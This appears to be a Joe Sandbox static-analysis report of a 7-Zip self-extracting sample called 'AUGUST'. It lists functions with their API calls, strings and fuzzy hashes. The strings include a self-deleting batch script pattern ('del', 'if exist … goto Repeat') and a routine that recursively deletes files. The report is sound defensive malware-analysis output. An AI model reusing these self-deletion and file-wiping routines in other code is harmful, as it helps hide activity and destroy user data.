Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698

Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509

Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09

Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F400

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction Fuzzy Hash:

Non-executed Functions

Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004034E5
SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
_wtol.MSVCRT ref: 0040367F
CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6

Strings

.lnk, xrefs: 004036FF

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18

Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
wsprintfW.USER32 ref: 00401FFD
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
GetLastError.KERNEL32 ref: 00402017
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
GetLastError.KERNEL32 ref: 0040204C
lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
SetLastError.KERNEL32(00000000), ref: 00402098
lstrlenA.KERNEL32(00413FD0), ref: 004020CC
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
_wtol.MSVCRT ref: 0040212A
MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

Strings

XpA, xrefs: 00401FB4
7zSfxString%d, xrefs: 00401FF7
\3A, xrefs: 00401FDB

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d$XpA$\3A
API String ID: 2117570002-3108448011
Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
LockResource.KERNEL32(00000000), ref: 00401C41
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
GetProcAddress.KERNEL32(00000000), ref: 00401C76
wsprintfW.USER32 ref: 00401C95
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
GetProcAddress.KERNEL32(00000000), ref: 00401CAD

Strings

%04X%c%04X%c, xrefs: 00401C8F
kernel32, xrefs: 00401C5D, 00401C62, 00401CA9
SetProcessPreferredUILanguages, xrefs: 00401C58
SetThreadPreferredUILanguages, xrefs: 00401CA4

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8

Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040779A
GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
GetWindow.USER32(?,00000005), ref: 00406D8F
GetWindow.USER32(00000000,00000002), ref: 00406DA5

Strings

uxtheme, xrefs: 00406D5E
\EA, xrefs: 00406D98
SetWindowTheme, xrefs: 00406D70

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$\EA$uxtheme
API String ID: 324724604-1613512829
Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC

Function 0041022D Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84

Function 0041206B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0

Function 00411F91 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0

Function 0040D72E Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50

Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
CloseHandle.KERNEL32(004177C4), ref: 00404C40
SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2

Strings

7ZSfx%03x.cmd, xrefs: 00404B58
" goto Repeat, xrefs: 00404BE0
if exist ", xrefs: 00404BC7
", xrefs: 00404BB9, 00404BBE, 00404C02
del ", xrefs: 00404B9F, 00404BA4, 00404BED
:Repeat, xrefs: 00404B92
open, xrefs: 00404C63

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58

Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

_wtol.MSVCRT ref: 004047DC
_wtol.MSVCRT ref: 004047F8

Strings

ExtractPathWidth, xrefs: 004047E5
MiscFlags, xrefs: 00404771, 00404776, 00404792
ExtractPathText, xrefs: 00404819
ExtractDialogText, xrefs: 004047AD
GUIFlags, xrefs: 0040473E, 00404743, 0040475F
OverwriteMode, xrefs: 00404721
GUIMode, xrefs: 004046F4
ExtractPathTitle, xrefs: 00404801
ErrorTitle, xrefs: 0040467F
ExtractTitle, xrefs: 004046AF
ExtractCancelText, xrefs: 004047A1
Progress, xrefs: 004046C7
WarningTitle, xrefs: 00404697
Title, xrefs: 00404611
|wA, xrefs: 0040464B
CancelPrompt, xrefs: 00404831
ExtractDialogWidth, xrefs: 004047BE

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
